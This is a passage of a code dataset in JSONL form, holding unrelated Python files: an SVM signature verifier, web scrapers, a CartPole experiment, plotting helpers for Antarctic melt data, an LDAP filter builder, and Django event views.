{:.3f}\".format(accuracy_score(y_test, predicted)))\n print(\"Below is the confusion matrix\")\n print(confusion_matrix(y_test,predicted))\n return svm_clf\n\n# Predict the user input\ndef test(path_str):\n X_predict = []\n file_path = path.relpath(path_str)\n img = Image.open(file_path).convert('LA')\n img_reduced = process_one(img)\n img_reduced = img_reduced.resize((28,28))\n Twod_array = np.asarray(img_reduced)\n Oned_array = Twod_array.ravel()\n Oned_array = Oned_array.astype(np.float64)\n X_predict.append(list(Oned_array))\n result = train().predict(X_predict)\n return result[0]\n\n\nif __name__ == '__main__': \n print(test(\"True.png\"))\n\n\n\n\n\n","sub_path":"SignatureVerification/Verification.py","file_name":"Verification.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125360747","text":"'''\r\nPrint out IMDB Top 250 movies\r\n'''\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nr = requests.get(\"http://www.imdb.com/chart/top\")\r\nr_html = r.text\r\nsoup = BeautifulSoup(r_html)\r\nfor titleColumn in soup.find_all(\"td\", class_ =\"titleColumn\"):\r\n print(titleColumn.a.text)\r\n","sub_path":"practicepython.org/IMDB250.py","file_name":"IMDB250.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"568520584","text":"import gym\nimport random\nimport numpy as np\nimport tensorflow as tf\n\n'''\nThe code solves question 1 and 2. The 2000 iterations for part 3 is created in this code and saved in this code.\n'''\nenv = gym.make('CartPole-v0')\nenv.reset()\nmax_episode = 300\ndf = 0.99 # Discount factor\n\n\n\ndef randompolicy(trajectories):\n results = np.zeros([trajectories, 2])\n data = np.empty([0,10])\n for episode in range(trajectories):\n observation = env.reset() # initial state at the start of the game\n\n for t in range(max_episode):\n # env.render()\n #action = (np.random.uniform(0, 1) > 0.5)*1 # Action is random 0 or 1 (left or right)\n action = (np.random.rand() > 0.5) * 1\n\n # Store current state and action. Make placeholder for reward and future state\n data = np.r_[data, [np.append(observation, [action, 0, 0, 0, 0, 0])]]\n\n observation, reward, done, info = env.step(action) # take action\n\n if done:\n reward = -1\n else:\n reward = 0\n # Store the resultant state from action and reward from action\n data[-1, 5:10] = np.append(observation, reward)\n if done:\n break\n results[episode,0] = t\n results[episode,1] = np.power(df, t) * reward\n\n return results, data\n\n\nprint('-----------------------------------------------')\nprint('Question 1: Results')\nresults, data = randompolicy(3)\nprint(results)\nprint(data.shape)\n\n\nprint('-----------------------------------------------')\nprint('Question 2: Mean and std')\nresults, _ = randompolicy(100)\nmean = np.mean(results,0)\nstd = np.std(results,0)\nprint(mean)\nprint(std)\n\nprint('-----------------------------------------------')\nprint('Question 3: ')\nfilepath = '/home/raza/Documents/Advanced/CW3/Code/data'\nresults, data = randompolicy(2000)\n\nprint(data.shape)\nnp.save(filepath, data)\nprint('Data saved in', filepath)\n#print(data)\n\n\n#print(results)\n\n","sub_path":"Code/problemA.py","file_name":"problemA.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55530860","text":"import sys\nimport os\nimport time\nfrom time import mktime\nfrom datetime import datetime\nimport collections\nimport pickle\nimport random\nimport argparse\nfrom shutil import copyfile\nfrom collections import defaultdict\nimport glob\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom utils import Config, safe_pickle_dump\nimport stopwords\n\n# lets load the existing database to memory\ntry:\n print(Config.db_path)\n db = pickle.load(open(Config.db_path, 'rb'))\nexcept Exception as e:\n print('error loading existing database:')\n print(e)\n print('starting from an empty database')\n db = {}\n\ndef get_full_paper_id(full_paper_id):\n return full_paper_id.split('/')[-1]\n\ndef get_paper_id_without_version(full_paper_id):\n return full_paper_id.split('/')[-1].split('v')[0]\n\nassert get_full_paper_id('http://arxiv.org/abs/1804.03131v1') == '1804.03131v1'\nassert get_paper_id_without_version('http://arxiv.org/abs/1804.03131v1') == '1804.03131'\n\nfull_id_to_title_dict = {get_full_paper_id(doc['id']): doc['title'] for k, doc in db.items()}\nid_before_version_to_title_dict = {get_paper_id_without_version(doc['id']): doc['title'] for k, doc in db.items()}\nunique_ids_before_version = set([get_paper_id_without_version(doc['id']) for k, doc in db.items()])\n\nwith open('full_paper_id_to_title_dict.pkl', 'wb') as f:\n pickle.dump(full_id_to_title_dict, f)\n\n\ndef get_latest_paper_identifier(list_of_paper_identifiers):\n version_nums = [paper_id.split('/')[-1].split('.pdf')[0].split('v')[-1]\n for paper_id in list_of_paper_identifiers]\n index_of_highest_version_num = version_nums.index(max(version_nums))\n\n return list_of_paper_identifiers[index_of_highest_version_num]#.split('/')[-1]\n\n# get latest version of all files\nall_files = glob.glob('data/txt/*')\n\nsame_paper_dict = defaultdict(list)\n# holds lists of different versions of said paper\n# example key: value = '1712.01217': '1712.01217v1.pdf.txt'\ncount_found_with_title = 0\ncount_found_with_id_before_version = 0\ncount_of_papers_with_more_than_1_version = 0\nfor f in all_files:\n full_id = f.split('/')[-1].split('.pdf')[0]\n id_without_version = full_id.split('v')[0]\n same_paper_dict[id_without_version].append(full_id)\n if len(same_paper_dict[id_without_version]) > 1:\n count_of_papers_with_more_than_1_version += 1\n if id_before_version_to_title_dict.get(id_without_version):\n count_found_with_title += 1\n if full_id_to_title_dict.get(full_id):\n count_found_with_id_before_version += 1\n\n\nfor paper_id in same_paper_dict.keys():\n print(same_paper_dict[paper_id])\n latest_paper_fp = get_latest_paper_identifier(same_paper_dict[paper_id])\n\n src_path = 'data/txt/{}.pdf.txt'.format(latest_paper_fp)\n dst_path = 'data/final_version_paper_txt/{}.pdf.txt'.format(latest_paper_fp.split('/')[-1])\n print('Copying src_path: {} to dst_path: {}'.format(src_path, dst_path))\n copyfile(src_path, dst_path)\n\nprint('Number of text files: {}'.format(len(all_files)))\nprint('Number of paper entries in db: {}'.format(len(db.keys())))\nprint('Num unique identifiers before version: {}'.format(len(unique_ids_before_version)))\nprint('Num papers with final version: {}'.format(len(same_paper_dict)))\nprint('full_id_to_title_dict len: {}'.format(len(full_id_to_title_dict)))\nprint('count_found_with_id_before_version len: {}'.format(count_found_with_id_before_version))\nprint('count_found_with_title len: {}'.format(count_found_with_title))\nprint('count_of_papers_with_more_than_1_version len: {}'.format(count_of_papers_with_more_than_1_version))\nprint('{} - {} = {}'.format(count_found_with_title, count_found_with_id_before_version, count_found_with_title - count_found_with_id_before_version))\nprint('Num found with title: {}/{}'.format(count_found_with_title, len(all_files)))\n","sub_path":"create_final_version_txt_dataset.py","file_name":"create_final_version_txt_dataset.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"164879607","text":"import collections\nimport re\nimport pickle\n\nchar_to_emoji = {\n 'a': '🇦', 'b': '🇧', 'c': '🇨', 'd': '🇩', 'e': '🇪', 'f': '🇫', 'g': '🇬',\n 'h': '🇭', 'i': '🇮', 'j': '🇯', 'k': '🇰', 'l': '🇱', 'm': '🇲', 'n': '🇳',\n 'o': '🇴', 'p': '🇵', 'q': '🇶', 'r': '🇷', 's': '🇸', 't': '🇹', 'u': '🇺',\n 'v': '🇻', 'w': '🇼', 'x': '🇽', 'y': '🇾', 'z': '🇿',\n}\n\nclass Rule:\n prop = ''\n expression = ''\n value = ''\n color = ''\n\n def __init__(self, prop: str, expression: str, value: str, color: str):\n self.prop = prop\n self.expression = expression\n self.value = value\n self.color = color\n\n\n def match(self, data: dict) -> bool:\n return re.match(self.expression, data[self.prop]) != None\n\n\nclass IconResolver:\n _rules = []\n _cache = {}\n\n\n def __init__(self, rules):\n self._rules = [self._parse_rule(rule) for rule in rules]\n\n def get_color(self, app):\n\n for rule in self._rules:\n if rule.match(app):\n return rule.color\n return '#ffffff'\n\n def resolve(self, app):\n id = pickle.dumps(app)\n if id in self._cache:\n return self._cache[id]\n\n for rule in self._rules:\n if rule.match(app):\n out = '%{F' + rule.color + '}' + rule.value + '%{F-}'\n break\n else:\n out = app['class'][0].lower()\n if out in char_to_emoji:\n out = char_to_emoji[out]\n\n self._cache[id] = out\n\n return out\n\n\n def _parse_rule(self, rule) -> Rule:\n parts = rule[0].split('=', 1)\n\n prop = 'class'\n match = ''\n\n if len(parts) > 1:\n prop = parts[0]\n match = parts[1]\n else:\n match = parts[0]\n\n # exp = re.escape(match).replace('\\\\*', '.+')\n exp = match\n\n return Rule(prop, exp, rule[1], rule[2])\n","sub_path":"icon_resolver.py","file_name":"icon_resolver.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"594592567","text":"\"\"\"ADD MODULE DOCSTRING HERE\"\"\"\n\n# Standard Library\nimport datetime as dt\nimport logging\n\n# Third-party\nimport numpy as np\nimport numpy.ma as ma\nimport pandas as pd\nimport matplotlib.colors as mcolors\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\n# Local modules/packages\n\n#------------------------------------------------------------------------------#\n\n__all__ = ['map_meltdays',\n 'map_tb',\n 'plot_meltindex',\n 'plot_platforms']\n\n#------------------------------------------------------------------------------#\n\nlogger = logging.getLogger(__name__)\n\n#==============================================================================#\n# XY PLOTS\n#==============================================================================#\n\ndef plot_platforms(flist, figname=None):\n \"\"\"ADD FUNCTION DOCSTRING HERE\"\"\"\n\n platforms = sorted(list(set(flist.platform)))\n sdate, edate = [], []\n for platform in platforms:\n dates = flist.date[flist.platform == platform].values\n sdate.append(pd.to_datetime(dates[0]))\n edate.append(pd.to_datetime(dates[-1]))\n # Convert dates to matplotlib's internal format\n sdate, edate = [mdates.date2num(item) for item in (sdate, edate)]\n ypos = np.arange(len(platforms)) + 1\n colors = ['dodgerblue', 'salmon', 'orange', 'orangered', 'chocolate']\n fig, ax = plt.subplots()\n # Plot the data\n ax.barh(ypos, edate - sdate, left=sdate, height=0.4, align='center', color=colors)\n ax.set_ylim([0.5,5.5])\n ax.set_yticks(ypos)\n ax.set_yticklabels(platforms, size='large')\n # Tell matplotlib that these are dates\n ax.xaxis_date()\n if figname is None:\n plt.show()\n else:\n plt.savefig(figname)\n\n#------------------------------------------------------------------------------#\n\ndef plot_meltindex(data, figname=None):\n \"\"\"ADD FUNCTION DOCSTRING HERE\"\"\"\n\n plt.close('all')\n plt.style.use('default')\n fig, axes = plt.subplots(2,1)\n\n width = 90\n\n ax = axes[0]\n bar1 = ax.bar(df1.index, df1['melt'], width, color='r')\n bar2 = ax.bar(df4.index+dt.timedelta(width), df4, width, color='b')\n ax.set_ylabel('Melt Index')\n ax.set_xlim(['1978-1-1', '2017-1-1'])\n ax.set_title('Polar Stereographic Grid / Std. Dev. Method')\n\n ax = axes[1]\n bar1 = ax.bar(df1.index, df1['melt'], width, color='r')\n bar2 = ax.bar(df3.index+dt.timedelta(width), df3, width, color='b')\n bar3 = ax.bar(df3b.index+dt.timedelta(2*width), df3b, width, color='dodgerblue')\n ax.set_ylabel('Melt Index')\n ax.set_xlim(['1978-1-1', '2017-1-1'])\n ax.set_title('EASE Grid / Threshold Method')\n ax.legend((bar1[0], bar2[0], bar3[0]), ('LGGE', 'SSMI', 'AMSR-E'), loc=1)\n\n if figname is None:\n plt.show()\n else:\n plt.savefig(figname)\n\n#==============================================================================#\n# MAPS\n#==============================================================================#\n\ndef map_tb(data, lats, lons, fout='map'):\n \"\"\"ADD FUNCTION DOCSTRING HERE\"\"\"\n\n plt.close('all')\n m = Basemap(projection='spstere', boundinglat=-60, lon_0=180, resolution='c')\n m.drawcoastlines(linewidth=1)\n m.drawmeridians(np.arange(0,360,30), linewidth=0.5, dashes=[4, 4])\n m.drawparallels(np.arange(-90,90,30), linewidth=0.5, dashes=[4, 4])\n datam = ma.masked_where(np.isnan(data), data)\n img = m.pcolormesh(lons, lats, datam, latlon=True, cmap=plt.cm.rainbow)\n cb = m.colorbar(img, 'right')\n plt.title('Placeholder Title')\n if fout is not None:\n plt.savefig(fout)\n\n#------------------------------------------------------------------------------#\n\ndef map_meltdays(data, lats, lons, figname=None):\n \"\"\"ADD FUNCTION DOCSTRING HERE\"\"\"\n\n fig = plt.figure()\n ax = fig.add_axes()\n m = Basemap(projection='spstere', boundinglat=-65, width=1000., lon_0=180, resolution='i')\n m.drawcoastlines(linewidth=1)\n m.drawmeridians(np.arange(0,360,30), linewidth=0.5, dashes=[4, 4])\n m.drawparallels(np.arange(-90,90,10), linewidth=0.5, dashes=[4, 4])\n datam = ma.masked_where(np.isnan(data), data)\n\n vmin = 1\n vmax = 15\n N = vmax-vmin+1\n base1 = plt.cm.get_cmap('tbrVar1')\n colors = base1(np.arange(34, 98))\n base2 = mcolors.ListedColormap(colors)\n colors = base2(np.linspace(0, 1, N))\n cmap = mcolors.ListedColormap(colors[:-1])\n cmap.set_under(color='0.6')\n cmap.set_over(color=colors[-1])\n\n img = m.pcolormesh(lons, lats, datam, latlon=True, vmin=vmin, vmax=vmax, cmap=cmap)\n plt.title('Number of melting days in Jan 2016')\n # cb = m.colorbar(mappable=img, location='bottom', drawedges=False, extend='both', size=\"3%\", pad=\"-8%\", ticks=np.arange(vmin, vmax+1))\n cbax = fig.add_axes([0.175, 0.15, 0.35, 0.02])\n cb = plt.colorbar(ax=ax, cax=cbax, orientation='horizontal', extend='both', ticks=np.arange(vmin, vmax+1))\n if figname is None:\n plt.show()\n else:\n plt.savefig(figname)\n return m, cb\n\n\n#------------------------------------------------------------------------------#\n","sub_path":"packages/melting/plots/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"470428080","text":"# -*- coding: utf-8 -*-\r\n# Tests for the Activity hook\r\n\r\nimport unittest\r\nfrom unittest.mock import Mock, patch\r\n\r\nfrom peewee import SqliteDatabase\r\n\r\nfrom pomito.hooks.activity import ActivityHook, ActivityModel\r\nfrom pomito.test import PomitoTestFactory\r\n\r\nimport fake_filesystem\r\nimport sure\r\n\r\nclass ActivityHookTests(unittest.TestCase):\r\n def setUp(self):\r\n test_factory = PomitoTestFactory()\r\n\r\n # Encapsulate platform concerns\r\n filesystem = fake_filesystem.FakeFilesystem()\r\n os_module = fake_filesystem.FakeOsModule(filesystem)\r\n test_factory.create_patch(self, 'os.path', os_module.path)\r\n test_factory.create_patch(self, 'os.makedirs', os_module.makedirs)\r\n\r\n ActivityModel.drop_table(True)\r\n\r\n self.pomodoro_service = test_factory.create_fake_service()\r\n self.activityhook = ActivityHook(self.pomodoro_service)\r\n self.activityhook.initialize()\r\n\r\n def tearDown(self):\r\n ActivityModel.drop_table(True)\r\n self.activityhook.close()\r\n\r\n def test_initialize_sets_activity_db(self):\r\n activityhook = ActivityHook(self.pomodoro_service)\r\n\r\n activityhook.initialize()\r\n\r\n ActivityHook.activity_db.shouldnt.be.equal(None)\r\n activityhook.close()\r\n\r\n def test_initialize_creates_signal_handlers(self):\r\n activityhook = ActivityHook(self.pomodoro_service)\r\n\r\n activityhook.initialize()\r\n\r\n self._count_receivers(self.pomodoro_service.signal_session_stopped)\\\r\n .should.be.equal(2)\r\n self._count_receivers(self.pomodoro_service.signal_break_stopped)\\\r\n .should.be.equal(2)\r\n self._count_receivers(self.pomodoro_service.signal_interruption_stopped)\\\r\n .should.be.equal(2)\r\n activityhook.close()\r\n\r\n def test_close_disconnects_signal_handlers(self):\r\n activityhook = ActivityHook(self.pomodoro_service)\r\n activityhook.initialize()\r\n\r\n activityhook.close()\r\n\r\n # Count is one because there is already a listener for self.activityhook\r\n self._count_receivers(self.pomodoro_service.signal_session_stopped)\\\r\n .should.be.equal(1)\r\n self._count_receivers(self.pomodoro_service.signal_break_stopped)\\\r\n .should.be.equal(1)\r\n self._count_receivers(self.pomodoro_service.signal_interruption_stopped)\\\r\n .should.be.equal(1)\r\n\r\n def test_log_handles_session_stop_event(self):\r\n test_task = self._create_task(100, 'session_start_task')\r\n self.pomodoro_service.start_session(test_task)\r\n self.pomodoro_service.stop_session()\r\n\r\n ActivityModel.select().where(ActivityModel.category ==\\\r\n 'session').count().should.be.equal(1)\r\n\r\n def test_log_handles_break_stop_event(self):\r\n self.pomodoro_service.start_break()\r\n self.pomodoro_service.stop_break()\r\n\r\n self._dump_activity_model()\r\n ActivityModel.select().where(ActivityModel.category ==\\\r\n 'break').count().should.be.equal(1)\r\n\r\n def test_log_handles_interruption_stop_event(self):\r\n self.pomodoro_service.start_interruption(None, False, False)\r\n self.pomodoro_service.stop_interruption()\r\n\r\n ActivityModel.select().where(ActivityModel.category ==\\\r\n 'interruption').count().should.be.equal(1)\r\n pass\r\n\r\n def _create_task(self, uid, description):\r\n from pomito.task import Task\r\n return Task(uid=uid, description=description, estimate=0, actual=0,\r\n tags=None)\r\n\r\n def _get_latest_entry(self):\r\n pass\r\n\r\n def _dump_activity_model(self):\r\n for activity in ActivityModel.select():\r\n print(\"{0};{1};{2}\".format(activity.timestamp, activity.category,\r\n activity.data))\r\n\r\n def _count_receivers(self, signal):\r\n from blinker.base import ANY\r\n\r\n return sum(1 for r in signal.receivers_for(ANY))\r\n \r\n","sub_path":"tests/hooks/test_activity.py","file_name":"test_activity.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"354886584","text":"#######################################\n# LDAP Query Builder\n# Date: Aug 2018\n# Options:\n# -c coniguration file locaiton\n# -o output file text\n#\n#######################################\n#######################################\n### CodeBlock: Modules & Init Var\n#######################################\nimport os, json, re, sys\nfrom pprint import pprint\nfrom argparse import ArgumentParser\n\nsearchStrings = {}\n\n### Read passed arguements from the command line\nparser = ArgumentParser()\nparser.add_argument(\"-c\", \"--config\", dest=\"cfile\", help=\"read configuration from CONFIG json\", metavar=\"FILE\", type=str)\nparser.add_argument(\"-o\", \"--output\", dest=\"ofile\", help=\"write the search terms to the following out text file\", metavar=\"FILE\", type=str)\nargs = parser.parse_args()\n\nconfig=args.cfile\noutputf=args.ofile\n\n### Checks on passed arguments\n# Try the configuration file, if it is not passed then exit the script\nif config is None:\n print(\"\\nNo Configuration file passed as argument. Exit on Error.\\n\")\n exit()\n# Try the output file, if it is not passed then create a default value\nif outputf is None:\n outputf=\"output.txt\"\n\n\n### If output file does not exist, create it\nif not os.path.exists(outputf):\n open(outputf,'w+').close()\n\n### Intake File parser equation - column format data, example: Excel file with column header\ndef rowDataIntake (fileObj,searchAtt,delim):\n ### Function (open_File_Object, Search Attribute)\n ### takes in the open file object,\n ### if iteration is first then find index in header of the search Attribute\n ### Then take that index, and build output dataset of index for each row in file object\n it=1\n output=[]\n for line in fileObj:\n line=(line.strip(\"\\n\")).split(delim)\n ### only run on the first iteration through the intake file, match index to header for search attribute in config\n if it ==1:\n ind=line.index(searchAtt)\n it=0\n continue\n output.append(line[ind])\n return output\n### Intake File parser equations - row format data\ndef columnDataIntake (fileObj,searchAtt,delim):\n ### Function (open_File_Object, Search Attribute)\n ### takes in the open file object,\n ### proceeds through intake file, if current line begins with the regex = search term then append to output array\n ### File examples: LDIF files\n output=[]\n for line in fileObj:\n if re.search(searchAtt,line):\n line=(line.strip(\"\\n\")).split(delim)\n output.append(line[1]) ### Assumption: the data is always seperated by carriage return, and the second string is the value we want\n return output\n\n### Directory Ops\ncurDir = os.path.abspath(os.path.dirname(__file__))\n# curDir = \"/Users/z001mc0/IAE/Dev/LDIF/LDAP_QueryBuilder\"\n\n### Read JSON config file in\nwith open(config,'r') as configfo: #read config file object\n configDict=json.load(configfo) #parse json into dictionary\n\n\n#######################################\n### CodeBlock: Create Search LDAP strings based on JSON config\n#######################################\n### only proceed if all required fields are in the parsed json dictionary, else report error\nif 'ldapSettings' in configDict and 'intake' in configDict:\n # create head of the search string\n ldapBegString = \"(\"+configDict['ldapSettings']['operator'] # with config relational operator\n ldapEndString = \"))\"\n # open the list to create search term from\n with open(configDict['intake']['searchIntakeDir'],'r') as intakefo: #read intake file object\n # iff the intake file is column formatted, feed open file object to column search term creater function\n if configDict['intake']['searchDataFormat'] == 'Row':\n searchTermsList=rowDataIntake(intakefo, configDict['intake']['searchAttribute'], configDict['intake']['searchDelimiter'])\n elif configDict['intake']['searchDataFormat'] == 'Column':\n searchTermsList=columnDataIntake(intakefo, configDict['intake']['searchAttribute'], configDict['intake']['searchDelimiter'])\n else:\n print(\"\\nJSON intake file missing critical data: intake-searchDataFormat missing or not matched.\\nExit\\n\")\n exit()\n # count number of elements in current config.json that are not expected (ie. not ldapSettings and not intake)\n for searchBaseind in range(len(list(configDict)) - 2,len(list(configDict))) :\n ### join the user search string by () & the search term for search base in current iteration\n tempString = (\")(\" + configDict[list(configDict)[searchBaseind]]['searchAttribute']+'=').join(searchTermsList)\n ### join the temp string with ldap search beginning and end\n searchStrings[list(configDict)[searchBaseind]] = ldapBegString + \"(\" + configDict[list(configDict)[searchBaseind]]['searchAttribute'] + \"=\" + tempString + ldapEndString\nelse:\n print(\"\\nJSON missing critical attributes: intake or ldapSettings missing attributes\\nExit\\n\")\n\n#######################################\n### CodeBlock: write to output file\n#######################################\nwith open(outputf,'w+') as file:\n file.write(json.dumps(searchStrings))\n","sub_path":"LDAP_QueryBuilder/ldapQueryBuilder.py","file_name":"ldapQueryBuilder.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"475508212","text":"import requests\nimport re\nimport parser\n\n# r=requests.get(\"http://www.baidu.com\")\n# print(r.text)\n\n\n# User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'\n}\n\nr = requests.get('https://www.hexuexiao.cn/meinv/guzhuang/', headers=headers)\n# rs=requests.get('//t.cdn.ink/image/2020/01/2020020916481695-scaled.jpeg',headers=headers)\n\n\n# print(r.request.haders)\n# print(rs.text)\n\n# print(r.text)\n\n\nhtml = r.text\n\n# \n# \"你与星河,皆可收藏-唯美女生\"\n\n# urls=re.findall('',html)\nurls = re.findall('
', html)\nprint(urls)\n\nfor url in urls:\n html_data = requests.get(url, headers=headers).text\n # \n jpgs = re.findall('', html_data)\n print(jpgs)\n img_data = requests.get(jpgs[0], headers=headers).content\n # print(img_data)\n # 数据保存\n file_name = jpgs[0].split('/')[-1]\n\n with open('靓丽图片/img//' + file_name, mode='wb') as f:\n f.write(img_data)\n print(file_name)\n","sub_path":"靓丽图片/requests_tast.py","file_name":"requests_tast.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"35277332","text":"import functools\nimport json\nfrom calendar import _nextmonth, _prevmonth\nfrom datetime import datetime, timedelta\n\nfrom django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ValidationError\nfrom django.db.models import BooleanField, Case, Max, Min, Prefetch, When\nfrom django.forms import DateField\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.utils import timezone\nfrom django.utils.formats import date_format\nfrom django.utils.safestring import mark_safe\nfrom django.utils.timezone import get_current_timezone, make_aware\nfrom django.utils.translation import gettext as _\nfrom django.views import View\nfrom django.views.generic import (\n CreateView,\n DeleteView,\n DetailView,\n FormView,\n ListView,\n RedirectView,\n TemplateView,\n UpdateView,\n)\nfrom django.views.generic.detail import SingleObjectMixin\nfrom guardian.shortcuts import assign_perm, get_objects_for_user, get_users_with_perms\nfrom recurrence.forms import RecurrenceField\n\nfrom ephios.core.calendar import ShiftCalendar\nfrom ephios.core.forms.events import EventDuplicationForm, EventForm, EventNotificationForm\nfrom ephios.core.models import Event, EventType, Shift\nfrom ephios.core.services.notifications.types import (\n CustomEventParticipantNotification,\n EventReminderNotification,\n NewEventNotification,\n)\nfrom ephios.core.signals import event_forms\nfrom ephios.extra.mixins import CanonicalSlugDetailMixin, CustomPermissionRequiredMixin\nfrom ephios.extra.permissions import get_groups_with_perms\n\n\ndef current_event_list_view(request):\n if request.session.get(\"event_list_view_type\", \"list\") == \"calendar\":\n return EventCalendarView.as_view()(request)\n return EventListView.as_view()(request)\n\n\nclass EventListView(LoginRequiredMixin, ListView):\n model = Event\n\n def get_queryset(self):\n return (\n get_objects_for_user(self.request.user, \"core.view_event\")\n .annotate(\n start_time=Min(\"shifts__start_time\"),\n end_time=Max(\"shifts__end_time\"),\n )\n .annotate(\n can_change=Case(\n When(\n id__in=get_objects_for_user(self.request.user, [\"core.change_event\"]),\n then=True,\n ),\n default=False,\n output_field=BooleanField(),\n )\n )\n .filter(end_time__gte=timezone.now())\n .select_related(\"type\")\n .prefetch_related(\"shifts\")\n .prefetch_related(Prefetch(\"shifts__participations\"))\n .order_by(\"start_time\")\n )\n\n def get_context_data(self, *, object_list=None, **kwargs):\n kwargs.setdefault(\"eventtypes\", EventType.objects.all())\n return super().get_context_data(**kwargs)\n\n\nclass EventDetailView(CustomPermissionRequiredMixin, CanonicalSlugDetailMixin, DetailView):\n model = Event\n permission_required = \"core.view_event\"\n\n def get_queryset(self):\n if self.request.user.has_perm(\"core.add_event\"):\n return Event.all_objects.all()\n return Event.objects.all()\n\n\nclass EventEditMixin:\n @functools.cached_property\n def plugin_forms(self):\n forms = []\n for __, resp in event_forms.send(sender=None, event=self.object, request=self.request):\n forms.extend(resp)\n return forms\n\n def get_context_data(self, **kwargs):\n kwargs[\"plugin_forms\"] = self.plugin_forms\n return super().get_context_data(**kwargs)\n\n def is_valid(self, form):\n return form.is_valid() and all(plugin_form.is_valid() for plugin_form in self.plugin_forms)\n\n def form_valid(self, form):\n response = super().form_valid(form)\n for plugin_form in self.plugin_forms:\n plugin_form.save()\n return response\n\n\nclass EventUpdateView(CustomPermissionRequiredMixin, EventEditMixin, UpdateView):\n model = Event\n queryset = Event.all_objects.all()\n permission_required = \"core.change_event\"\n\n def get_form(self, form_class=None):\n return EventForm(\n data=self.request.POST or None, user=self.request.user, instance=self.object\n )\n\n def post(self, request, *args, **kwargs):\n self.object = self.get_object()\n form = self.get_form()\n if self.is_valid(form):\n return self.form_valid(form)\n return self.form_invalid(form)\n\n\nclass EventCreateView(CustomPermissionRequiredMixin, EventEditMixin, CreateView):\n template_name = \"core/event_form.html\"\n permission_required = \"core.add_event\"\n accept_object_perms = False\n model = EventType\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n self.object = form.instance\n if self.is_valid(form):\n return self.form_valid(form)\n return self.form_invalid(form)\n\n def dispatch(self, request, *args, **kwargs):\n self.eventtype = get_object_or_404(EventType, pk=self.kwargs.get(\"type\"))\n return super().dispatch(request, *args, **kwargs)\n\n def get_form(self, form_class=None):\n return EventForm(\n data=self.request.POST or None,\n user=self.request.user,\n eventtype=self.eventtype,\n )\n\n def get_context_data(self, **kwargs):\n inactive_events = Event.all_objects.filter(active=False)\n kwargs.setdefault(\"inactive_events\", inactive_events)\n kwargs.setdefault(\"eventtype\", self.eventtype)\n return super().get_context_data(**kwargs)\n\n def get_success_url(self):\n return reverse(\"core:event_createshift\", kwargs={\"pk\": self.object.pk})\n\n\nclass EventActivateView(CustomPermissionRequiredMixin, SingleObjectMixin, View):\n permission_required = \"core.add_event\"\n queryset = Event.all_objects.all()\n\n def post(self, request, *args, **kwargs):\n event = self.get_object()\n try:\n event.activate()\n messages.success(\n request,\n _(\"The event {title} has been saved.\").format(title=event.title),\n )\n except ValidationError as e:\n messages.error(request, e)\n return redirect(event.get_absolute_url())\n\n\nclass EventDeleteView(CustomPermissionRequiredMixin, DeleteView):\n queryset = Event.all_objects.all()\n permission_required = \"core.delete_event\"\n success_url = reverse_lazy(\"core:event_list\")\n\n\nclass EventArchiveView(CustomPermissionRequiredMixin, ListView):\n permission_required = \"core.view_past_event\"\n model = Event\n template_name = \"core/event_archive.html\"\n\n def get_queryset(self):\n return (\n get_objects_for_user(self.request.user, \"core.view_event\")\n .annotate(\n start_time=Min(\"shifts__start_time\"),\n end_time=Max(\"shifts__end_time\"),\n )\n .filter(end_time__lt=timezone.now())\n .select_related(\"type\")\n .order_by(\"-start_time\")\n )\n\n\nclass EventCopyView(CustomPermissionRequiredMixin, SingleObjectMixin, FormView):\n permission_required = \"core.add_event\"\n model = Event\n template_name = \"core/event_copy.html\"\n form_class = EventDuplicationForm\n\n def setup(self, request, *args, **kwargs):\n super().setup(request, *args, **kwargs)\n self.object = self.get_object()\n\n def form_valid(self, form):\n occurrences = form.cleaned_data[\"recurrence\"].between(\n datetime.now() - timedelta(days=1),\n datetime.now() + timedelta(days=730), # allow dates up to two years in the future\n inc=True,\n dtstart=datetime.combine(\n DateField().to_python(self.request.POST[\"start_date\"]), datetime.min.time()\n ),\n )\n for date in occurrences:\n event = self.get_object()\n start_date = event.get_start_time().date()\n shifts = event.shifts.all()\n event.pk = None\n event.save()\n assign_perm(\n \"view_event\", get_groups_with_perms(self.get_object(), [\"view_event\"]), event\n )\n assign_perm(\n \"change_event\", get_groups_with_perms(self.get_object(), [\"change_event\"]), event\n )\n assign_perm(\n \"change_event\",\n get_users_with_perms(\n self.get_object(), only_with_perms_in=[\"change_event\"], with_group_users=False\n ),\n event,\n )\n\n shifts_to_create = []\n for shift in shifts:\n shift.pk = None\n # shifts on following days should have the same offset from the new date\n offset = 